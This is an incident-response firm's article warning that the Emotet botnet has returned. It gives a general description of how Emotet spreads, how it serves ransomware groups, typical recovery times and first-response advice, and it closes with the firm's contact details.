The Emotet Malware & Botnet is Back
Certainly, a pandemic of new ransomware infections is inevitable. Ransomware is a method hackers use to block any access to your systems and files until a ransom has been paid via Bitcoin, or other hard to trace cryptocurrency methods. The ransom actors will direct anyone who is attacked to deposit the requested ransom in a crypto wallet; the amounts will vary but are generally quite large with the average payment being over $500k in 2021.
Removal and recovery of Emotet alone is difficult, but is even more difficult if a ransomware package has been delivered and detonated. The ransomware threat actors may also steal data and threaten to release it if they are not paid. Either way, they hold a company for ransom. In order for the threat actors to infect your systems, they need a method to get access. This is where nefarious malware groups and their stealthy Botnets, such as that associated with the Emotet trojan (or Heodo), come into play.
Until it was taken down temporarily in 2021, Emotet malware and the support infrastructure was known to be the most powerful Botnet in existence. Their job in the criminal world was—and is again—to gain a foothold into networks and then sell access to various threat actors who want to be inside of a computer or network. This can be a group just trying to steal intellectual property, or more likely, a ransomware group (such as Ryuk) trying to infect systems with ransomware and demand payment. Think of Emotet as the burglar that picks the lock (steals credentials), breaks in, and puts a door in place for future access and proliferation of infections throughout a system.
Emotet was taken down temporarily by international cooperation of law enforcement in January of 2021, but it is back and has more capability than ever. Emotet does not require the consent of a user and is wormable, so it spreads easily once an infected file, email or other event starts the process on a computer within a network. Even if you have not yet been ransomed, if you find your organization has been infected with Emotet malware, you should take it very seriously and act rapidly to stop it. Previous versions of Emotet used Microsoft Office macros that are now disabled by default but can be turned on by users. The current version of Emotet now installs via PowerShell commands in Windows shortcut files (.LNK). This makes it particularly dangerous and hard to detect.
A Little More About Emotet Malware
Emotet uses functionality that helps the software evade detection by some anti-malware products, and uses worm-like capabilities to help spread to other connected computers. This helps in the distribution of the malware. This functionality has led the Department of Homeland Security to conclude that Emotet is one of the costliest and most destructive types of malware, affecting government, private sectors, individuals and organizations, and costing upwards of $1M per incident to clean up for larger organizations. Emotet is primarily spread via other malware dropping it onto an existing infected system. Finding the initial starting point on a system for analysis is difficult. This is because the main element deletes itself after the initial execution, which can cause issues with finding the ransomware in the first place. The dropper creates a file for the payload to be saved. However, if the file creation fails, the dropper will then try to write it into its own directory, which could cause more problems.
How Long Do Ransomware Incidents Normally Last?
Emotet incidents tend to be much longer than other ransomware enabling malware. This is due to the high ransom amounts demanded through Bitcoin and the labor-intensive nature of finding and eradicating the malware. We typically see a seven day timeframe from the start of recovery to bringing online the most vital systems you run; but this can be longer. The rest of the critical systems will typically take another seven days to recover.
What Should You Do?
If you have been attacked by Emotet—whether you have or have not yet been held for ransom—disconnect all your systems from the Internet immediately. Do not let anyone convince you to wait. Do it IMMEDIATELY. You may well save yourself and/or your entire organization from the trojan infection (which is bad enough) turning into to a Ransomware event. This complete disconnection typically halts the act of kicking off encryption processes. Some people shut down systems suspected of being infected, but this has its issues too. While shutting them down is an option, sometimes doing so corrupts the operating system and data which prevents subsequent recovery, even if a ransom is paid.
If you suspect you are a victim of an attack, then contact us immediately, at any hour of the day and on holidays and weekends. Please don’t wait, as minutes to seconds really do matter. Our team will intervene with deep expertise, precision, agility, and promptness to restore the functionality and IT security of your organization.
We are available 24×7, 365 days a year, at (877) NOC-NOC4 or (877) 662-6624. Or you can reach out to us via the form or chat on this page.